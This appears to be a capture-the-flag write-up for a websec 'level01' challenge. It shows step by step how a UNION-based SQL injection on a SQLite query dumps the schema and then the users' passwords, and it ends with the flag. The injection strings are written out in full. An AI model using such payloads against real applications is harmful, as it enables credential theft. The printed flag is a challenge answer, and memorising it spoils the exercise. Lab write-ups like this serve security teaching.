level01

Select the user by ID you wish to view

Let's click on the Submit Query button.

Reading the source code, we can see that the database being used is SQLite and our input is being inserted within the following query:

SELECT id,username FROM users WHERE id=' . $injection . ' LIMIT 1

SQL Injection

In order to retrieve the flag, we first need to retrieve the table name. We can refer this PayloadsAllTheThings list.

Extracting SQLite version

The SQLite version can be retrieved using the following query:

SELECT sqlite_version();

Since the original SELECT statement selects two columns, we need to do the same in our UNION query.

If we provide the following input:

1 UNION SELECT Null, sqlite_version();

The resultant query will be:

SELECT id,username FROM users WHERE id=1 UNION SELECT Null, sqlite_version(); LIMIT 1

The version of SQLite being used is 3.27.2.

Extracting database structure

For SQLite versions 3.33.0 and previous, the sqlite_master table contains the schema for the database including information about all the tables, indexes, views, and triggers that exist in the database.

SELECT sql FROM sqlite_master

If we provide the following input:

1 UNION SELECT Null, sql FROM sqlite_master;

The resultant query becomes:

SELECT id,username FROM users WHERE id=1 UNION SELECT Null, sql FROM sqlite_master; LIMIT 1

There is a users table which has three columns: id, username and password.

Extracting the flag

Now that we know the table name is users, we can easily retrieve the password from the table.

If we provide the following input:

1 UNION SELECT id, password FROM users;

The resultant query becomes:

SELECT id,username FROM users WHERE id=1 UNION SELECT id, password FROM users; LIMIT 1

Flag

WEBSEC{Simple_SQLite_Injection}